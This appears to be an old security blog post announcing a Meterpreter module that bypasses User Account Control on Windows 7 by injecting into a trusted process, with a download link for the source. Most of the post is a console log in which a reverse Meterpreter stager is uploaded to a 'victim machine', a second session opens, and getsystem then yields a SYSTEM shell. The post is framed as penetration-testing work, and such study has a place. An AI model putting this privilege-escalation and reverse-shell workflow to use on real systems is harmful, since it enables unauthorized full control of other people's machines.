Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module

Happy New Year everyone! Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson ( on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms. Source code is in the zip along with the meterpreter plugin. You can download it here.

[*] Sending stage (749056 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Dec 31 20:43:24 -0500 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST= LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system….
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint with UACBypass in effect…
meterpreter > [*] Meterpreter session 2 opened ( -> at Fri Dec 31 20:43:40 -0500 2010
meterpreter >
Background session 1? [y/N]
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
nt authority\system

Category Article

2 Responses to “c0decstuff”

What's on Your Mind...

Thank f' u C0mment